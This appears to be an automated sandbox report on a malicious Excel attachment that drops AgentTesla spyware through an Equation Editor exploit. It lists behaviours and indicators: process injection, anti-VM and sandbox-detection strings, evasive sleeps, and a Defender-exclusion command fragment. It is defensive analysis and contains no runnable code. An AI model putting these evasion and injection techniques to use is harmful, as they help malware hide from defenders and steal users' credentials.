Source: 5.2.vbc.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b9C7F6A15u002dF507u002d449Bu002dA77Cu002dF679FE507AF2u007d/B98B4337u002d58F8u002d4581u002dA8DCu002d221E532A33BF.cs

Large array initialization: .cctor: array initializer size 11960

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00661BC0 NtQueryInformationProcess,		4_2_00661BC0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00661BB8 NtQueryInformationProcess,		4_2_00661BB8

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00216012	4_2_00216012
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00218620	4_2_00218620
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021A778	4_2_0021A778
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00219850	4_2_00219850
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00215C68	4_2_00215C68
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00218E99	4_2_00218E99
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C0A0	4_2_0021C0A0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C0B0	4_2_0021C0B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021932A	4_2_0021932A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C3C1	4_2_0021C3C1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021B521	4_2_0021B521
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021B530	4_2_0021B530
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002145B0	4_2_002145B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002145C0	4_2_002145C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021A723	4_2_0021A723
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C738	4_2_0021C738
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002188D1	4_2_002188D1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021D924	4_2_0021D924
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C931	4_2_0021C931
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C940	4_2_0021C940
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002179E8	4_2_002179E8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002119F8	4_2_002119F8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00215C58	4_2_00215C58
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021CD89	4_2_0021CD89
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00664051	4_2_00664051
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00666E38	4_2_00666E38
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00662D18	4_2_00662D18
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00664518	4_2_00664518
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006601A8	4_2_006601A8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00661981	4_2_00661981
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00660478	4_2_00660478
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00660AE8	4_2_00660AE8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006626B1	4_2_006626B1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00662710	4_2_00662710
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00666DEA	4_2_00666DEA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006667F0	4_2_006667F0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00666BC8	4_2_00666BC8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00666DAF	4_2_00666DAF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00661188	4_2_00661188
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00661198	4_2_00661198
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001E5328	5_2_001E5328
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001E6348	5_2_001E6348
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001E5670	5_2_001E5670
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001EB808	5_2_001EB808
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001E208F	5_2_001E208F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001EC974	5_2_001EC974
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00356A30	5_2_00356A30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00359830	5_2_00359830
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00354600	5_2_00354600
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0035CC03	5_2_0035CC03
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00350048	5_2_00350048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003514B8	5_2_003514B8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00355380	5_2_00355380
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00353248	5_2_00353248
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003584D0	5_2_003584D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003552D2	5_2_003552D2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0035D1E8	5_2_0035D1E8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00359B0C	5_2_00359B0C

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ORDER 9387383900.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: rrr[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 5.2.vbc.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.vbc.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/10@1/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$ORDER 9387383900.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRBF96.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);

Source: ORDER 9387383900.xlsx

Virustotal: Detection: 33%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ORDER 9387383900.xlsx

Initial sample: OLE indicators vbamacros = False

Source: ORDER 9387383900.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00218397 push ebp; iretd	4_2_00218398
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021D7BC push edx; retf	4_2_0021D7BD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003522ED pushfd ; ret	5_2_003522F1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003530C0 pushfd ; retf	5_2_003531A1

Source: initial sample	Static PE information: section name: .text entropy: 7.78593990731
Source: initial sample	Static PE information: section name: .text entropy: 7.78593990731

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: ORDER 9387383900.xlsx

Stream path 'EncryptedPackage' entropy: 7.99934422624 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2916, type: MEMORY

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\vbc.exe	Window / User API: threadDelayed 9145			Jump to behavior
Source: C:\Users\Public\vbc.exe	Window / User API: threadDelayed 600			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 260	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2892	Thread sleep time: -100778s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1616	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1900	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1192	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1192	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1840	Thread sleep count: 9145 > 30	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1840	Thread sleep count: 600 > 30	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1192	Thread sleep count: 92 > 30	Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 100778	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior

Source: vbc.exe, 00000005.00000002.2345833661.0000000001050000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2345833661.0000000001050000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2345833661.0000000001050000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Source: Yara match	File source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3044, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2916, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.387bed0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.387bed0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3662578.5.raw.unpack, type: UNPACKEDPE

